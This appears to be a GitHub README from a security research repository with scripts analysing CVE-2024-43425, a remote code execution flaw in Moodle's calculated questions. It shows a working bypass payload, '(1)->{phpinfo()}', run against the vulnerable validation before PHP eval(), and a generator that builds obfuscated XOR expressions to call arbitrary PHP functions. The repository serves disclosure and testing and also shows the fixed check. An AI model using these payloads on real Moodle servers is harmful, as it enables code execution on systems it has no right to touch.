Skip to content

Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)

Notifications You must be signed in to change notification settings

RedTeamPentesting/moodle-rce-calculatedquestions

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 

Repository files navigation

Scripts to Test Input Validation in Moodle Calculated Questions (CVE-2024-43425)

This repository contains the companion scripts to the blog post Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle, which describes a remote code execution vulnerability in the Moodle learning platform.

Test the Validation Logic

The scripts in the validation directory can be used to directly test input strings against the validation logic used by Moodle to prevent abuse of a call to PHP eval().

All code snippets were directly adapted from Moodle's source code, using the 4.4.1 release for the vulnerable version and 4.4.2 for the fixed version. The scripts include the relevant parts of the question/type/calculated/questiontype.php file.

The validation.php file uses the vulnerable validation logic:

$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]

This repository also includes the fixed version of the validation code in validation-fixed.php:

$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]

Generate Function Names

The script xor-generator.py can be used to generate expressions based on variable functions, which allow calling arbitrary PHP functions with a single numeric parameter in vulnerable versions of Moodle:

$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test

About

Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published